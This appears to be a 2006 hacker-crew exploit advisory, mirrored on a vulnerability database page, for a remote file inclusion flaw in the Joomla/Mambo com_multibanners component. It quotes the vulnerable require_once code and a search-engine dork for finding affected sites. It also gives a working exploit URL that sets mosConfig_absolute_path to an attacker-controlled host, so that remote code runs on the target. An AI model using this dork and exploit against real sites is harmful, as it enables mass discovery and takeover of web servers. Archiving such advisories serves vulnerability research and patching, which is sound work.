Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

2006-07-2400:00:00

vulners.com

JSON

#############################SolpotCrew Community################################

Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt

#################################################################################

Bug Found By :Blue|Spy

contact: [email protected]

Website : http://kunamgede.biz, http://blue-spy.net

################################################################################

Greetz: h4ntu , Fungky, Solpot, Matdhule

and all crew #mardongan @ irc.dal.net

###############################################################################
code from extadminmenus.class.php

if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}

Dork:
inurl:com_multibanners

exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]

##############################MY LOVE JUST FOR U LIENA#########################
########################################################################

JSON

Com Multibanners Remote File Inclusion &#40;mosConfig_absolute_path&#41;

Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt

Bug Found By :Blue|Spy

contact: [email protected]

Website : http://kunamgede.biz, http://blue-spy.net

Greetz: h4ntu , Fungky, Solpot, Matdhule

and all crew #mardongan @ irc.dal.net

Com Multibanners Remote File Inclusion (mosConfig_absolute_path)